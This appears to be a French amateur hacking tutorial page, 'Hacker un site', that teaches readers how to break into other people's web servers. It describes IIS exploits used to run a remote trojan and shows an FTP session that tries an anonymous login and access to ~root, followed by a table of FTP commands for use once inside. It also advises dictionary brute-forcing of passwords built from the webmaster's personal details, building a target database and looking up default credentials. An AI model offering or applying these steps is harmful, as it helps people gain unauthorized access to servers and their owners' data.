Hacker un site
1/- Hack avec un Exploit:
Un exploit est un petit programme exploitant une faille dans le logiciel serveur.
ex: Sur les seveurs equipés de Windows NT et de IIS, il y une faille permettant
de faire executer au serveur un programme situé sur un autre serveur; un trojan par exemple.
Uen fois le programme executé il ne reste plus qu'a rentrer par le "brèche ouverte".
2/- Hack par FTP:
Cet exemple est super connu et ne marche quasiment plus,
mais en cherchant bien vous pourrez peut-être trouver un site le permettant encore :
Vous vous connectez au net
Vous éxecutez ftp -n , une fenêtre dos va s'ouvrir avec l'invite ftp>.
ftp>open www.moncul.com.
Connected to moncul.com
220 victim.com FTP server ready.
ftp> quote user ftp
331 Guest login ok, send ident as password.
ftp> quote cwd ~root
530 Please login with USER and PASS
ftp>: quote pass ftp
Si le serveur n'est pas protégé: ça marche et vous êtes dans le serveur sinon
(c'est ce qui risque d'arriver) vous allez voir ailleurs.
Si vous êtes entré ce sont les commandes ftp qu'il faut désormais utiliser,
en voici quelques unes:
| Commande :
|
Effet
: |
| mkdir |
Créer un
répertoire |
| rmdir |
Supprimer
un répertoire |
| pwd |
Se repérer sur
le disque |
| cd |
Pour aller
dans un répertoire |
| cd .. |
Pour
revenir au répertoir précédent |
| dir |
Pour voir tout se qui se
trouve sur le disque |
| del |
Pour
supprimer un fichier |
| get |
Pour
télécharger un fichier |
| put |
Pour
uploader un fichier |
| ascii |
Passe la
connection en mode ascii |
| binary |
Passe la
connection en mode binaire |
| help |
Pour
connaitre les commandes accéptées |
| open |
Pour
établir une connection avec un serveur distant. |
| quit |
Pour se
déconnecter du serveur |
3/-Hack FTP par BrutForce:
En fait, vous allez lancez un logiciel qui va essayer de se connecter en FTP
en utilisant un dictionnaire de pass.
Cette méthode est très longue et le mot de passe n'est peut être pas dans votre dicos de pass .
Vous pouvez essayer avec des pass en rapport avec le webmaster
(son login, nom, prenom, date de naissance, nom du cleps, de sa femme, etc...).
Indications:
1/ Renseignez vous sur des cibles potentielles, établissez une base de donnée sur elles
(tel hébergeur, tel os ou logiciel serveur).
Comme cela, lorsque une faille est découverte, il ne vous reste plus qu'a regarder
quelles sont les serveurs repondant à cette faille.
2/ Si vous cherchez bien, google propose une base de donnée de codes d'accès
et de mots de pass par défaults des logiciels et equipements reseaux.
www.google.fr
Si vous avez d'autres choses à ajouter,
contactez moi.
-= Retour =-
Nous sommes le 09/06/2026
UnderZone est une creation de Lil'Jim - Contact
- A
propos - Copyright
- v. 2.0
